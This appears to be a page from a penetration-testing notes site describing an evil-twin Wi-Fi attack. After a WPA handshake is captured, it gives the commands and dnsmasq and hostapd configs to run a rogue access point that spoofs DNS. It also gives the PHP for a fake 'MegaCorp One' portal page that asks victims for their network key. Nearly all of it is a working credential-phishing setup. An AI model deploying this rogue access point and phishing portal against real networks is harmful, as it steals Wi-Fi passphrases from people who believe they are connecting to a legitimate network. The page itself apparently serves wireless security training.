Captive Portal

Capture WPA handshake then:

install tooling:

apt install apache2 libapache2-mod-php
apt install dnsmasq
apt install nftables
apt install hostapd

Networking setup:

# IP Bits
ip addr add 192.168.87.1/24 dev wlan0
ip link set wlan0 up

# DNS bits
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
nft 'add chain nat PREROUTING { type nat hook prerouting priority dstnat; policy accept; }'
nft add rule ip nat PREROUTING iifname "wlan0" udp dport 53 counter redirect to :53
nft 'add chain nat postrouting { type nat hook postrouting priority 100 ; }'
nft add rule ip nat postrouting oifname "eth0" ip daddr != 10.0.0.1/24 masquerade

DNSMasQ setup (dns.conf):

 Main options
# http://www.thekelleys.org.uk/dnsmasq/docs/dnsmasq-man.html
domain-needed
bogus-priv
no-resolv
filterwin2k
expand-hosts
domain=localdomain
local=/localdomain/
# Only listen on this address. When specifying an
# interface, it also listens on localhost.
# We don't want to interrupt any local resolution
# since the DNS responses will be spoofed
listen-address=192.168.87.1

# DHCP range
dhcp-range=192.168.87.100,192.168.87.199,12h
dhcp-lease-max=100

# This should cover most queries
# We can add 'log-queries' to log DNS queries
address=/com/192.168.87.1
address=/org/192.168.87.1
address=/net/192.168.87.1

# Entries for Windows 7 and 10 captive portal detection
address=/dns.msftncsi.com/131.107.255.255

and execute:

dnsmasq --conf-file=dns.conf

HostAPD setup:

create hostapd.conf:

interface=wlan0
ssid=Captive_Portal
channel=11

# 802.11n
hw_mode=g
ieee80211n=1

# Uncomment the following lines to use OWE instead of an open network
#wpa=2
#ieee80211w=2
#wpa_key_mgmt=OWE
#rsn_pairwise=CCMP

and execute:

hostapd -B hostapd.conf

Building the portal:

create 'index.php' in /var/www/html/portal:

<!DOCTYPE html>
<html lang="en">

	<head>
		<link href="assets/css/style.css" rel="stylesheet">
		<title>MegaCorp One - Nanotechnology Is the Future</title>
	</head>
	<body style="background-color:#000000;">
		<div class="navbar navbar-default navbar-fixed-top" role="navigation">
			<div class="container">
				<div class="navbar-header">
					<a class="navbar-brand" style="font-family: 'Raleway', sans-serif;font-weight: 900;" href="index.php">MegaCorp One</a>
				</div>
			</div>
		</div>

		<div id="headerwrap" class="old-bd">
			<div class="row centered">
				<div class="col-lg-8 col-lg-offset-2">
					<?php
						if (isset($_GET["success"])) {
							echo '<h3>Login successful</h3>';
							echo '<h3>You may close this page</h3>';
						} else {
							if (isset($_GET["failure"])) {
								echo '<h3>Invalid network key, try again</h3><br/><br/>';
							}
					?>
				<h3>Enter network key</h3><br/><br/>
				<form action="login_check.php" method="post">
					<input type="password" id="passphrase" name="passphrase"><br/><br/>
					<input type="submit" value="Connect"/>
				</form>
				<?php
						}
				?>
				</div>

				<div class="col-lg-4 col-lg-offset-4 himg ">
					<i class="fa fa-cog" aria-hidden="true"></i>
				</div>
			</div>
		</div>

	</body>
</html>

PreviousPMKID NextForensics

Last updated 2 years ago